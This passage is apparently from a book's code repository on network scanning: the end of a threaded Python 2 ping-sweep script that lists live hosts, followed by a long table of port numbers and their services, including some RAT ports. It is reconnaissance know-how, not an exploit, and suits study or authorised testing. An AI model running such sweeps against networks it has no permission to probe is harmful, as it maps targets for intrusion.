25 | t1= datetime.now()
26 | '''section 2'''
27 | class myThread (threading.Thread):
28 | def __init__(self,st,en):
29 | threading.Thread.__init__(self)
30 | self.st = st
31 | self.en = en
32 | def run(self):
33 | run1(self.st,self.en)
34 | '''section 3'''
35 | def run1(st1,en1):
36 | #print "Scanning in Progess"
37 | for ip in xrange(st1,en1):
38 | #print ".",
39 | addr = net2+str(ip)
40 | comm = ping1+addr
41 | response = os.popen(comm)
42 | for line in response.readlines():
43 | if(line.count("TTL")):
44 | break
45 | if (line.count("TTL")):
46 | #print addr, "--> Live"
47 | list1.append(addr)
48 | ''' Section 4 '''
49 | total_ip =en1-st1
50 | tn =20 # number of ip handled by one thread
51 | total_thread = total_ip/tn
52 | total_thread=total_thread+1
53 | threads= []
54 | try:
55 | for i in xrange(total_thread):
56 | en = st1+tn
57 | if(en >en1):
58 | en =en1
59 | thread = myThread(st1,en)
60 | thread.start()
61 | threads.append(thread)
62 | st1 =en
63 | except:
64 | print "Error: unable to start thread"
65 | print "\tNumber of Threads active:", threading.activeCount()
66 |
67 | for t in threads:
68 | t.join()
69 | print "Exiting Main Thread"
70 | list1.sort()
71 |
72 | for key in list1:
73 | print key,"-->" "Live"
74 | t2= datetime.now()
75 | total =t2-t1
76 | print "scanning complete in " , total
--------------------------------------------------------------------------------
/Chapter02/Chapter2_scanning/Chapter2_scanning/programs_2nd_chapter/port.txt:
--------------------------------------------------------------------------------
1 | 1 : : Port Service Multiplexer ( : MUX) Official
2 | 2 : CompressNET[5] Management Utility[6] Official
3 | 3 : CompressNET[5] Compression Process[7] Official
4 | 4 : Unassigned Official
5 | 5 : Remote Job Entry Official
6 | 6 : Unassigned Official
7 | 7 : Echo Protocol Official
8 | 8 : Unassigned Official
9 | 9 : Discard Protocol Official
10 | 9 : Wake-on-LAN Unofficial
11 | 10 : Unassigned Official
12 | 11 : Active Users (systat service)[8][9] Official
13 | 12 : Unassigned Official
14 | 13 : Daytime Protocol (RFC 867) Official
15 | 14 : Unassigned Official
16 | 15 : Previously netstat service[8] Unofficial
17 | 16 : Unassigned Official
18 | 17 : Quote of the Day Official
19 | 18 : Message Send Protocol Official
20 | 19 : Character Generator Protocol (CHARGEN) Official
21 | 20 : FTP data transfer Official
22 | 21 : , SCTP : FTP control (command) Official
23 | 22 : , SCTP : Secure Shell (SSH)—used for secure logins, file transfers (scp, sftp) and port forwarding Official
24 | 23 : Telnet protocol—unencrypted text communications Official
25 | 24 : Priv-mail : any private mail system. Official
26 | 25 : Simple Mail Transfer Protocol (SMTP)—used for e-mail routing between mail servers Official
27 | 26 : Unassigned Official
28 | 27 : NSW User System FE Official
29 | 29 : MSG ICP Official
30 | 33 : Display Support Protocol Official
31 | 35 : Any private printer server protocol Official
32 | 37 : TIME protocol Official
33 | 39 : Resource Location Protocol[10] (RLP)—used for determining the location of higher level services from hosts on a network Official
34 | 40 : Unassigned Official
35 | 42 : ARPA Host Name Server Protocol Official
36 | 42 : Windows Internet Name Service Unofficial
37 | 43 : WHOIS protocol Official
38 | 47 : NI FTP Official
39 | 49 : TACACS Login Host protocol Official
40 | 50 : Remote Mail Checking Protocol[11] Official
41 | 51 : IMP Logical Address Maintenance Official
42 | 52 : XNS (Xerox Network Systems) Time Protocol Official
43 | 53 : Domain Name System (DNS) Official
44 | 54 : XNS (Xerox Network Systems) Clearinghouse Official
45 | 55 : ISI Graphics Language (ISI-GL) Official
46 | 56 : XNS (Xerox Network Systems) Authentication Official
47 | 56 : Route Access Protocol (RAP)[12] Unofficial
48 | 57 : any private terminal access Official
49 | 58 : XNS (Xerox Network Systems) Mail Official
50 | 64 : CI (Travelport) (formerly Covia) Comms Integrator Official
51 | 67 : Bootstrap Protocol (BOOTP) Server; also used by Dynamic Host Configuration Protocol (DHCP) Official
52 | 68 : Bootstrap Protocol (BOOTP) Client; also used by Dynamic Host Configuration Protocol (DHCP) Official
53 | 69 : Trivial File Transfer Protocol (TFTP) Official
54 | 70 : Gopher protocol Official
55 | 71 : NETRJS protocol Official
56 | 72 : NETRJS protocol Official
57 | 73 : NETRJS protocol Official
58 | 74 : NETRJS protocol Official
59 | 77 : Any private Remote Job Entry Official
60 | 80 : , SCTP : Hypertext Transfer Protocol (HTTP)[13] Official
61 | 80 : QUIC (from Chromium) for HTTP Unofficial
62 | 81 : Torpark—Onion routing Unofficial
63 | 82 : Torpark—Control Unofficial
64 | 88 : Kerberos—authentication system Official
65 | 90 : dnsix (DoD Network Security for Information Exchange) Security Attribute Token Map Official
66 | 90 : PointCast (dotcom) Unofficial
67 | 99 : WIP Message protocol Unofficial
68 | 100 : CyberGate RAT protocol Unofficial
69 | 101 : NIC host name Official
70 | 102 : ISO-TSAP (Transport Service Access Point) Class 0 protocol;[14] also used by Digital Equipment Corporation DECnet (Phase V+) over : /IP Official
71 | 104 : ACR/NEMA Digital Imaging and Communications in Medicine (DICOM) Official
72 | 105 : CCSO Nameserver Protocol (Qi/Ph) Official
73 | 107 : Remote TELNET Service[15] protocol Official
74 | 108 : SNA Gateway Access Server[1] Official
75 | 109 : Post Office Protocol v2 (POP2) Official
76 | 110 : Post Office Protocol v3 (POP3) Official
77 | 111 : ONC RPC (Sun RPC) Official
78 | 113 : Ident—Authentication Service/Identification Protocol,[16] used by IRC servers to identify users Official
79 | 113 : Authentication Service[16] (auth) Official
80 | 115 : Simple File Transfer Protocol Official
81 | 117 : UUCP Path Service Official
82 | 118 : SQL (Structured Query Language) Services Official
83 | 119 : Network News Transfer Protocol (NNTP)—retrieval of newsgroup messages Official
84 | 123 : Network Time Protocol (NTP)—used for time synchronization Official
85 | 126 : Formerly Unisys Unitary Login, renamed by Unisys to NXEdit. Used by Unisys Programmer's Workbench for Clearpath MCP, an IDE for Unisys MCP software development Official
86 | 135 : Microsoft EPMAP (End Point Mapper), Unofficial
87 | 137 : NetBIOS NetBIOS Name Service Official
88 | 138 : NetBIOS NetBIOS Datagram Service Official
89 | 139 : NetBIOS NetBIOS Session Service Official
90 | 143 : Internet Message Access Protocol (IMAP)—management of email messages Official
91 | 152 : Background File Transfer Program (BFTP)[18] Official
92 | 153 : SGMP, Simple Gateway Monitoring Protocol Official
93 | 156 : SQL Service Official
94 | 158 : DMSP, Distributed Mail Service Protocol[19] Unofficial
95 | 161 : Simple Network Management Protocol (SNMP) Official
96 | 162 : Simple Network Management Protocol Trap (SNMPTRAP)[20] Official
97 | 170 : Print-srv, Network PostScript Official
98 | 175 : VMNET (IBM z/VM, z/OS & z/VSE—Network Job Entry (NJE)) Official
99 | 177 : X Display Manager Control Protocol (XDMCP) Official
100 | 179 : BGP (Border Gateway Protocol) Official
101 | 194 : Internet Relay Chat (IRC) Official
102 | 199 : SMUX, SNMP Unix Multiplexer Official
103 | 201 : AppleTalk Routing Maintenance Official
104 | 209 : The Quick Mail Transfer Protocol Official
105 | 210 : ANSI Z39.50 Official
106 | 213 : Internetwork Packet Exchange (IPX) Official
107 | 218 : Message posting protocol (MPP) Official
108 | 220 : Internet Message Access Protocol (IMAP), version 3 Official
109 | 259 : ESRO, Efficient Short Remote Operations Official
110 | 262 : Arcisdms Official
111 | 264 : BGMP, Border Gateway Multicast Protocol Official
112 | 280 : http-mgmt Official
113 | 300 : ThinLinc Web Access Unofficial
114 | 308 : Novastor Online Backup Official
115 | 311 : Mac OS X Server Admin (officially AppleShare IP Web administration) Official
116 | 318 : PKIX TSP, Time Stamp Protocol Official
117 | 319 : Precision Time Protocol (PTP) event messages Official
118 | 320 : Precision Time Protocol (PTP) general messages Official
119 | 350 : MATIP-Type A, Mapping of Airline Traffic over Internet Protocol Official
120 | 351 : MATIP-Type B, Mapping of Airline Traffic over Internet Protocol Official
121 | 356 : cloanto-net-1 (used by Cloanto Amiga Explorer and VMs) Official
122 | 366 : ODMR, On-Demand Mail Relay Official
123 | 369 : Rpc2portmap Official
124 | 370 : codaauth2—Coda authentication server Official
125 | 370 : codaauth2—Coda authentication server Official
126 | 370 : securecast1—Outgoing packets to NAI's SecureCast servers[21]As of 2000 Unofficial
127 | 371 : ClearCase albd Official
128 | 383 : HP data alarm manager Official
129 | 384 : A Remote Network Server System Official
130 | 387 : AURP, AppleTalk Update-based Routing Protocol[22] Official
131 | 389 : Lightweight Directory Access Protocol (LDAP) Official
132 | 399 : Digital Equipment Corporation DECnet (Phase V+) over : /IP Official
133 | 401 : UPS Uninterruptible Power Supply Official
134 | 427 : Service Location Protocol (SLP) Official
135 | 433 : NNSP, part of Network News Transfer Protocol Official
136 | 443 : SCTP Hypertext Transfer Protocol over TLS/SSL (HTTPS) Official
137 | 443 : QUIC (from Chromium) for HTTPS Unofficial
138 | 444 : SNPP, Simple Network Paging Protocol (RFC 1568) Official
139 | 445 : Microsoft-DS Active Directory, Windows shares Official
140 | 445 : Microsoft-DS SMB file sharing Official
141 | 464 : Kerberos Change/Set password Official
142 | 465 : URL Rendezvous Directory for SSM (Cisco protocol) Official
143 | 465 : Simple Mail Transfer Protocol over TLS/SSL (SMTPS) Unofficial
144 | 475 : : nethaspsrv (Aladdin Knowledge Systems Hasp services, : /IP version) Official
145 | 491 : GO-Global remote access and application publishing software Unofficial
146 | 497 : Dantz Retrospect Official
147 | 500 : Internet Security Association and Key Management Protocol (ISAKMP) Official
148 | 502 : Modbus, Protocol Official
149 | 504 : Citadel—multiservice protocol for dedicated clients for the Citadel groupware system Official
150 | 510 : FirstClass Protocol (FCP), used by FirstClass client/server groupware system Official
151 | 512 : Rexec, Remote Process Execution Official
152 | 512 : comsat, together with biff Official
153 | 513 : rlogin Official
154 | 513 : Who[23] Official
155 | 514 : Shell—used to execute non-interactive commands on a remote system (Remote Shell, rsh, remsh) Official
156 | 514 : Syslog—used for system logging Official
157 | 515 : Line Printer Daemon—print service Official
158 | 517 : Talk Official
159 | 518 : NTalk Official
160 | 520 : efs, extended file name server Official
161 | 520 : Routing Information Protocol (RIP) Official
162 | 521 : Routing Information Protocol Next Generation (RIPng) Official
163 | 524 : NetWare Core Protocol (NCP) is used for a variety things such as access to primary NetWare server resources, Time Synchronization, etc. Official
164 | 525 : Timed, Timeserver Official
165 | 530 : RPC Official
166 | 531 : AOL Instant Messenger Unofficial
167 | 532 : netnews Official
168 | 533 : netwall, For Emergency Broadcasts Official
169 | 540 : UUCP (Unix-to-Unix Copy Protocol) Official
170 | 542 : commerce (Commerce Applications) Official
171 | 543 : klogin, Kerberos login Official
172 | 544 : kshell, Kerberos Remote shell Official
173 | 545 : OSIsoft PI (VMS), OSISoft PI Server Client Access Unofficial
174 | 546 : DHCPv6 client Official
175 | 547 : DHCPv6 server Official
176 | 548 : Apple Filing Protocol (AFP) over : Official
177 | 550 : new-rwho, new-who[23] Official
178 | 554 : Real Time Streaming Protocol (RTSP) Official
179 | 556 : Remotefs, RFS, rfs_server Official
180 | 560 : rmonitor, Remote Monitor Official
181 | 561 : monitor Official
182 | 563 : NNTP over TLS/SSL (NNTPS) Official
183 | 564 : Plan9 Unofficial
184 | 587 : e-mail message submission[24] (SMTP) Official
185 | 591 : FileMaker 6.0 (and later) Web Sharing (HTTP Alternate, also see port 80) Official
186 | 593 : HTTP RPC Ep Map, Remote procedure call over Hypertext Transfer Protocol, often used by Distributed Component Object Model services and Microsoft Exchange Server Official
187 | 604 : TUNNEL profile,[25] a protocol for BEEP peers to form an application layer tunnel Official
188 | 623 : ASF Remote Management and Control Protocol (ASF-RMCP) Official
189 | 625 : Open Directory Proxy (ODProxy) Unofficial
190 | 631 : Internet Printing Protocol (IPP) Official
191 | 631 : Common Unix Printing System (CUPS) administration console (extension to IPP) Unofficial
192 | 635 : RLZ DBase Official
193 | 636 : Lightweight Directory Access Protocol over TLS/SSL (LDAPS) Official
194 | 639 : MSDP, Multicast Source Discovery Protocol Official
195 | 641 : SupportSoft Nexus Remote Command (control/listening): A proxy gateway connecting remote control traffic Official
196 | 643 : SANity Official
197 | 646 : LDP, Label Distribution Protocol, a routing protocol used in MPLS networks Official
198 | 647 : DHCP Failover protocol[26] Official
199 | 648 : RRP (Registry Registrar Protocol)[27] Official
200 | 651 : IEEE-MMS Official
201 | 653 : SupportSoft Nexus Remote Command (data): A proxy gateway connecting remote control traffic Official
202 | 654 : Media Management System (MMS) Media Management Protocol (MMP)[28] Official
203 | 655 : Tinc VPN daemon Unofficial
204 | 657 : IBM RMC (Remote monitoring and Control) protocol, used by System p5 AIX Integrated Virtualization Manager (IVM)[29] and Hardware Management Console to connect managed logical partitions (LPAR) to enable dynamic partition reconfiguration Official
205 | 660 : Mac OS X Server administration Official
206 | 666 : Doom, first online first-person shooter Official
207 | 666 : airserv-ng, aircrack-ng's server for remote-controlling wireless devices Unofficial
208 | 674 : ACAP (Application Configuration Access Protocol) Official
209 | 688 : REALM-RUSD (ApplianceWare Server Appliance Management Protocol) Official
210 | 690 : VATP (Velneo Application Transfer Protocol) Official
211 | 691 : MS Exchange Routing Official
212 | 694 : Linux-HA High availability Heartbeat Official
213 | 695 : IEEE-MMS-SSL (IEEE Media Management System over SSL)[30] Official
214 | 698 : OLSR (Optimized Link State Routing) Official
215 | 700 : EPP (Extensible Provisioning Protocol), a protocol for communication between domain name registries and registrars (RFC 5734) Official
216 | 701 : LMP (Link Management Protocol (Internet)),[31] a protocol that runs between a pair of nodes and is used to manage traffic engineering (TE) links Official
217 | 702 : IRIS[32][33] (Internet Registry Information Service) over BEEP (Blocks Extensible Exchange Protocol)[34] (RFC 3983) Official
218 | 706 : Secure Internet Live Conferencing (SILC) Official
219 | 711 : Cisco Tag Distribution Protocol[35][36][37]—being replaced by the MPLS Label Distribution Protocol[38] Official
220 | 712 : Topology Broadcast based on Reverse-Path Forwarding routing protocol (TBRPF) (RFC 3684) Official
221 | 749 : Kerberos (protocol) administration Official
222 | 750 : kerberos-iv, Kerberos version IV Official
223 | 751 : kerberos_master, Kerberos authentication Unofficial
224 | 752 : passwd_server, Kerberos Password (kpasswd) server Unofficial
225 | 753 : Reverse Routing Header (rrh)[39] Official
226 | 753 : Reverse Routing Header (rrh) Official
227 | 753 : userreg_server, Kerberos userreg server Unofficial
228 | 754 : tell send Official
229 | 754 : krb5_prop, Kerberos v5 slave propagation Unofficial
230 | 754 : tell send Official
231 | 760 : krbupdate [kreg], Kerberos registration Unofficial
232 | 782 : Conserver serial-console management server Unofficial
233 | 783 : SpamAssassin spamd daemon Unofficial
234 | 800 : mdbe daemon Official
235 | 808 : Microsoft Net. : Port Sharing Service Unofficial
236 | 829 : Certificate Management Protocol[40] Unofficial
237 | 843 : Adobe Flash[41] Unofficial
238 | 847 : DHCP Failover protocol Official
239 | 848 : Group Domain Of Interpretation (GDOI) protocol Official
240 | 860 : iSCSI (RFC 3720) Official
241 | 861 : OWAMP control (RFC 4656) Official
242 | 862 : TWAMP control (RFC 5357) Official
243 | 873 : rsync file synchronization protocol Official
244 | 888 : cddbp, CD DataBase (CDDB) protocol (CDDBP), IBM Endpoint Manager Remote Control Unofficial
245 | 897 : Brocade SMI-S RPC Unofficial
246 | 898 : Brocade SMI-S RPC SSL Unofficial
247 | 901 : Samba Web Administration Tool (SWAT) Unofficial
248 | 901 : VMware Virtual Infrastructure Client (from managed device to management console) Unofficial
249 | 902 : ideafarm-door (IdeaFarm (tm) Operations) Official
250 | 902 : VMware Server Console (from management console to managed device) Unofficial
251 | 903 : ideafarm-panic (IdeaFarm (tm) Operations) Official
252 | 903 : VMware Remote Console[42] Unofficial
253 | 904 : VMware Server Alternate (if 902 is in use, i.e. SUSE linux) Unofficial
254 | 911 : Network Console on Acid (NCA)—local tty redirection over OpenSSH Unofficial
255 | 944 : Network File System Service Unofficial
256 | 953 : Domain Name System (DNS) RNDC Service Unofficial
257 | 973 : Network File System over IPv6 Service Unofficial
258 | 981 : SofaWare Technologies Remote HTTPS management for firewall devices running embedded Check Point FireWall-1 software Unofficial
259 | 987 : Microsoft Windows SBS SharePoint Unofficial
260 | 989 : FTPS Protocol (data): FTP over TLS/SSL Official
261 | 990 : FTPS Protocol (control): FTP over TLS/SSL Official
262 | 991 : NAS (Netnews Administration System)[43] Official
263 | 992 : TELNET protocol over TLS/SSL Official
264 | 993 : Internet Message Access Protocol over TLS/SSL (IMAPS) Official
265 | 994 : Internet Relay Chat over TLS/SSL (IRCS) Official
266 | 995 : Post Office Protocol 3 over TLS/SSL (POP3S) Official
267 | 999 : ScimoreDB Database System Unofficial
268 | 1002 : Opsware agent (aka cogbot) Unofficial
269 | 1010 : ThinLinc Web Administration Unofficial
270 | 1023 : Reserved[1]
271 | 1025 : NFS or IIS or Teradata Unofficial
272 | 1026 : Often used by Microsoft DCOM services Unofficial
273 | 1027 : Task Scheduler Unofficial
274 | 1027 : Native IPv6 behind IPv4-to-IPv4 NAT Customer Premises Equipment (6a44)[44] Official
275 | 1029 : Often used by Microsoft DCOM services Unofficial
276 | 1030 : services.exe Unofficial
277 | 1058 : nim, IBM AIX Network Installation Manager (NIM) Official
278 | 1059 : nimreg, IBM AIX Network Installation Manager (NIM) Official
279 | 1064 : lsass.exe Unofficial
280 | 1080 : SOCKS proxy Official
281 | 1085 : WebObjects Official
282 | 1098 : rmiactivation, RMI Activation Official
283 | 1099 : rmiregistry, RMI Registry Official
284 | 1109 : Kerberos Post Office Protocol (KPOP) Unofficial
285 | 1110 : EasyBits School network discovery protocol (for Intel's CMPC platform) Unofficial
286 | 1119 : Used by some Blizzard games[45] Unofficial
287 | 1140 : AutoNOC protocol Official
288 | 1167 : phone, conference calling Unofficial
289 | 1169 : Tripwire Official
290 | 1176 : Perceptive Automation[dead link] Indigo[dead link] Home automation server—configuration and control access Official
291 | 1182 : AcceleNet Intelligent Transfer Protocol Official
292 | 1194 : OpenVPN Official
293 | 1198 : The cajo project Free dynamic transparent distributed computing in Java Official
294 | 1200 : scol, protocol used by SCOL 3D virtual worlds server to answer world name resolution client request[46] Official
295 | 1200 : scol, protocol used by SCOL 3D virtual worlds server to answer world name resolution client request Official
296 | 1200 : Steam Friends Applet Unofficial
297 | 1214 : Kazaa Official
298 | 1217 : Uvora Online Unofficial
299 | 1220 : QuickTime Streaming Server administration Official
300 | 1223 : TGP, TrulyGlobal Protocol, also known as "The Gur Protocol" (named for Gur Kimchi of TrulyGlobal) Official
301 | 1232 : first-defense, Remote systems monitoring service from Nexum, Inc Official
302 | 1234 : VLC media player default port for : /RTP stream Unofficial
303 | 1234 : Mercurial and git default ports for serving Hyper Text Unofficial
304 | 1236 : Symantec BindView Control UNIX Default port for : management server connections Unofficial
305 | 1241 : Nessus Security Scanner Official
306 | 1270 : Microsoft System Center Operations Manager (SCOM) (formerly Microsoft Operations Manager (MOM)) agent Official
307 | 1293 : IPSec (Internet Protocol Security) Official
308 | 1301 : Palmer Performance OBDNet Unofficial
309 | 1306 : Boomerang Official
310 | 1309 : Altera Quartus jtagd Official
311 | 1311 : Dell OpenManage HTTPS Official
312 | 1313 : Xbiim (Canvii server)[citation needed] Unofficial
313 | 1314 : Festival Speech Synthesis System Unofficial
314 | 1319 : AMX ICSP Official
315 | 1319 : AMX ICSP Official
316 | 1323 : brcd (Todd Picquelle - multi-purpose application port) Official
317 | 1337 : neo4j-shell Unofficial
318 | 1337 : Men and Mice DNS Official
319 | 1337 : WASTE Encrypted File Sharing Program Unofficial
320 | 1341 : Qubes (Manufacturing Execution System) Official
321 | 1344 : Internet Content Adaptation Protocol Official
322 | 1352 : IBM Lotus Notes/Domino (RPC) protocol Official
323 | 1364 : IBM Connect:Direct/FTP+ FTPS Protocol: FTP over TLS/SSL Unofficial
324 | 1387 : cadsi-lm, LMS International (formerly Computer Aided Design Software, Inc. (CADSI)) LM Official
325 | 1414 : IBM WebSphere MQ (formerly known as MQSeries) Official
326 | 1417 : Timbuktu Service 1 Port Official
327 | 1418 : Timbuktu Service 2 Port Official
328 | 1419 : Timbuktu Service 3 Port Official
329 | 1420 : Timbuktu Service 4 Port Official
330 | 1431 : Reverse Gossip Transport Protocol (RGTP), used to access a General-purpose Reverse-Ordered Gossip Gathering System (GROGGS) bulletin board, such as that implemented on the Cambridge University's Phoenix system Official
331 | 1433 : MSSQL (Microsoft SQL Server database management system) Server Official
332 | 1434 : MSSQL (Microsoft SQL Server database management system) Monitor Official
333 | 1470 : Solarwinds Kiwi Log Server Official
334 | 1481 : AIRS Official
335 | 1494 : Citrix XenApp Independent Computing Architecture (ICA) thin client protocol[47] Official
336 | 1500 : IBM Tivoli Storage Manager server Unofficial
337 | 1500 : NetGuard GuardianPro firewall (NT4-based) Remote Management Unofficial
338 | 1501 : IBM Tivoli Storage Manager client scheduler Unofficial
339 | 1501 : NetGuard GuardianPro firewall (NT4-based) Authentication Client Unofficial
340 | 1503 : Windows Live Messenger (Whiteboard and Application Sharing) Unofficial
341 | 1512 : Microsoft Windows Internet Name Service (WINS) Official
342 | 1513 : Garena Garena Gaming Client Official
343 | 1521 : nCube License Manager, SQLnet Official
344 | 1521 : Oracle database default listener, in future releases official port 2483 Unofficial
345 | 1524 : ingreslock, ingres Official
346 | 1527 : Apache Derby Network Server default port Unofficial
347 | 1528 : Oracle database common alternative for listener Unofficial
348 | 1533 : IBM Sametime IM—Virtual Places Chat Microsoft SQL Server Official
349 | 1534 : Eclipse Target Communication Framework (TCF) agent discovery[48] Unofficial
350 | 1547 : Laplink Official
351 | 1550 : 3m-image-lm Image Storage license manager 3M Company Official
352 | 1550 : Gadu-Gadu (direct client-to-client) Unofficial
353 | 1580 : IBM Tivoli Storage Manager server web interface Unofficial
354 | 1581 : IBM Tivoli Storage Manager web client Unofficial
355 | 1581 : MIL STD 2045-47001 VMF Official
356 | 1583 : Pervasive PSQL Unofficial
357 | 1589 : Cisco VQP (VLAN Query Protocol) / VMPS Unofficial
358 | 1590 : GE Smallworld Datastore Server (SWMFS/Smallworld Master Filesystem)[citation needed] Unofficial
359 | 1604 : Darkcomet RAT server (Remote Administration Tool/Trojan) Unofficial
360 | 1627 : iSketch[citation needed] Unofficial
361 | 1628 : LonWorks Remote Network Interface (RNI) Official
362 | 1628 : LonWorks IP tunneling (ANSI EIA/CEA-852, EN 14908-4) Official
363 | 1629 : Alternate LonWorks Remote Network Interface (RNI) Official
364 | 1629 : LonWorks IP tunneling configuration server (ANSI EIA/CEA-852, EN 14908-4) Official
365 | 1645 : Old radius port, RADIUS authentication protocol. Enabled for compatibility reasons by default on Cisco and Juniper Networks RADIUS servers.[49] Official port is 1812. : port 1645 MUST NOT be used.[50] Unofficial
366 | 1646 : Old radacct port, RADIUS accounting protocol. Enabled for compatibility reasons by default on Cisco and Juniper Networks RADIUS servers. Official port is 1813. : port 1646 MUST NOT be used.[50] Unofficial
367 | 1666 : Perforce Unofficial
368 | 1677 : Novell GroupWise clients in client/server access mode Official
369 | 1688 : Microsoft Key Management Service for KMS Windows Activation Unofficial
370 | 1700 : Cisco RADIUS Change of Authorization for TrustSec[citation needed] Unofficial
371 | 1701 : Layer 2 Forwarding Protocol (L2F) & Layer 2 Tunneling Protocol (L2TP) Official
372 | 1707 : Windward Studios Official
373 | 1707 : Romtoc Interactive Modular Multiplayer Client-Server Online Application Interface & Layer 2 Tunneling Protocol (L2TP) Unofficial
374 | 1716 : America's Army Massively multiplayer online game (MMO) Unofficial
375 | 1719 : H.323 Registration and alternate communication Official
376 | 1720 : H.323 Call signalling Official
377 | 1723 : Microsoft Point-to-Point Tunneling Protocol (PPTP) Official
378 | 1725 : Valve Steam Client Unofficial
379 | 1755 : Microsoft Media Services (MMS, ms-streaming) Official
380 | 1761 : cft-0 Official
381 | 1761 : cft-0 Official
382 | 1761 : Novell Zenworks Remote Control utility Unofficial
383 | 1762 : cft-1 to cft-7 Official
384 | 1763 : cft-1 to cft-7 Official
385 | 1764 : cft-1 to cft-7 Official
386 | 1765 : cft-1 to cft-7 Official
387 | 1766 : cft-1 to cft-7 Official
388 | 1767 : cft-1 to cft-7 Official
389 | 1768 : cft-1 to cft-7 Official
390 | 1776 : Federal Emergency Management Information System Official
391 | 1792 : Moby[citation needed] Unofficial
392 | 1801 : Microsoft Message Queuing Official
393 | 1812 : radius, RADIUS authentication protocol Official
394 | 1813 : radacct, RADIUS accounting protocol Official
395 | 1863 : MSNP (Microsoft Notification Protocol), used by the Microsoft Messenger service and a number of Instant Messaging clients Official
396 | 1883 : MQ Telemetry Transport (MQTT), formerly known as MQIsdp (MQSeries SCADA protocol) Official
397 | 1886 : Leonardo over IP Pro2col Ltd Unofficial
398 | 1900 : Microsoft SSDP Enables discovery of UPnP devices Official
399 | 1920 : IBM Tivoli monitoring console Unofficial
400 | 1935 : Adobe Systems Macromedia Flash Real Time Messaging Protocol (RTMP) "plain" protocol Official
401 | 1947 : SentinelSRM (hasplm), Aladdin HASP License Manager Official
402 | 1967 : Cisco IOS IP Service Level Agreements (IP SLAs) Control Protocol[citation needed] Unofficial
403 | 1970 : Netop Remote Control Official
404 | 1971 : Netop School Official
405 | 1972 : InterSystems Caché Official
406 | 1975 : Cisco TCO (Documentation) Official
407 | 1978 : The Remote Mouse Server Port
408 | 1984 : Big Brother and related Xymon (formerly Hobbit) System and Network Monitor Official
409 | 1985 : Cisco HSRP Official
410 | 1997 : Chizmo Networks Transfer Tool[citation needed] Unofficial
411 | 1998 : Cisco X.25 over : (XOT) service Official
412 | 2000 : Cisco SCCP (Skinny) Official
413 | 2001 : CAPTAN Test Stand System Unofficial
414 | 2002 : Secure Access Control Server (ACS) for Windows[citation needed] Unofficial
415 | 2008 : Stylex Secured server Unofficial
416 | 2010 : Artemis: Spaceship Bridge Simulator default port Unofficial
417 | 2014 : Remoticus Unofficial
418 | 2030 : Oracle services for Microsoft Transaction Server Unofficial
419 | 2031 : mobrien-chat(http://chat.mobrien.com:2031) Official
420 | 2041 : Mail. Ru Agent communication protocol[citation needed] Unofficial
421 | 2049 : Network File System Official
422 | 2049 : shilp Official
423 | 2053 : knetd Kerberos de-multiplexor Unofficial
424 | 2055 : Iliad-Odyssey Protocol Official
425 | 2056 : Civilization 4 multiplayer Unofficial
426 | 2071 : Axon Control Protocol (ACP) Official
427 | 2074 : Vertel VMF SA (i.e. App.. SpeakFreely) Official
428 | 2077 : TrelliSoft Agent Official
429 | 2080 : Autodesk NLM (FLEXlm) Official
430 | 2082 : Infowave Mobility Server Official
431 | 2082 : CPanel default Unofficial
432 | 2083 : Secure Radius Service (radsec) Official
433 | 2083 : CPanel default SSL Unofficial
434 | 2086 : GNUnet Official
435 | 2086 : WebHost Manager default Unofficial
436 | 2087 : WebHost Manager default SSL Unofficial
437 | 2095 : CPanel default Web mail Unofficial
438 | 2096 : CPanel default SSL Web mail Unofficial
439 | 2100 : Warzone 2100 multiplayer Unofficial
440 | 2102 : zephyr-srv Project Athena Zephyr Notification Service server Official
441 | 2103 : zephyr-clt Project Athena Zephyr Notification Service serv-hm connection Official
442 | 2104 : zephyr-hm Project Athena Zephyr Notification Service hostmanager Official
443 | 2105 : IBM MiniPay Official
444 | 2105 : eklogin Kerberos encrypted remote login (rlogin) Unofficial
445 | 2105 : zephyr-hm-srv Project Athena Zephyr Notification Service hm-serv connection (should use port 2102) Unofficial
446 | 2115 : MIS Department Unofficial
447 | 2121 : FTP proxy[citation needed] Unofficial
448 | 2142 : TDMoIP (RFC 5087) Official
449 | 2144 : Iron Mountain LiveVault Agent[citation needed] Unofficial
450 | 2145 : Iron Mountain LiveVault Agent[citation needed] Unofficial
451 | 2156 : Talari Reliable Protocol Official
452 | 2159 : GDB Remote Debug Port Official
453 | 2160 : APC Agent Official
454 | 2161 : APC Agent Official
455 | 2179 : VMConnect to Hyper-V hosts Official
456 | 2181 : EForward-document transport system Official
457 | 2181 : Apache ZooKeeper default client port Unofficial
458 | 2190 : TiVoConnect Beacon[citation needed] Unofficial
459 | 2195 : Apple Push Notification Service Link Unofficial
460 | 2196 : Apple Push Notification—Feedback Link Unofficial
461 | 2200 : Tuxanci game server[51] Unofficial
462 | 2210 : NOAAPORT Broadcast Network Official
463 | 2210 : NOAAPORT Broadcast Network Official
464 | 2210 : MikroTik Remote management for "The Dude" Unofficial
465 | 2211 : EMWIN Official
466 | 2211 : EMWIN Official
467 | 2211 : MikroTik Secure management for "The Dude" Unofficial
468 | 2212 : LeeCO POS Server Service Official
469 | 2212 : LeeCO POS Server Service Official
470 | 2212 : Port-A-Pour Remote WinBatch Unofficial
471 | 2219 : NetIQ NCAP Protocol Official
472 | 2220 : NetIQ End2End Official
473 | 2221 : ESET Anti-virus updates [52] Unofficial
474 | 2222 : ESET Remote administrator [52] Unofficial
475 | 2222 : DirectAdmin default
476 | 2223 : ESET Remote administrator [52] Unofficial
477 | 2223 : Microsoft Office OS X antipiracy network monitor[citation needed] Unofficial
478 | 2224 : ESET Remote administrator [52] Unofficial
479 | 2225 : ESET Remote administrator [52] Unofficial
480 | 2226 : ESET Remote administrator [52] Unofficial
481 | 2261 : CoMotion Master Official
482 | 2262 : CoMotion Backup Official
483 | 2266 : M-Files Official
484 | 2301 : HP System Management Redirect to port 2381[citation needed] Unofficial
485 | 2302 : ArmA multiplayer (default for game) Unofficial
486 | 2302 : Halo: Combat Evolved multiplayer Unofficial
487 | 2303 : ArmA multiplayer (default for server reporting) (default port for game +1) Unofficial
488 | 2305 : ArmA multiplayer (default for VoN) (default port for game +3) Unofficial
489 | 2323 : Philips TVs based on jointSPACE[53] Unofficial
490 | 2345 : Default Used by Symon Communications - Symon2KpipeServer -can be changed by administrator to anything Unofficial
491 | 2351 : AIM game LAN network port Unofficial
492 | 2368 : Used by Ghost Blogging Platform Unofficial
493 | 2369 : Default for BMC Software Control-M/Server—Configuration Agent, though often changed during installation Unofficial
494 | 2370 : Default for BMC Software Control-M/Server—to allow the Control-M/Enterprise Manager to connect to the Control-M/Server Unofficial
495 | 2375 : Docker REST API (plain) Official
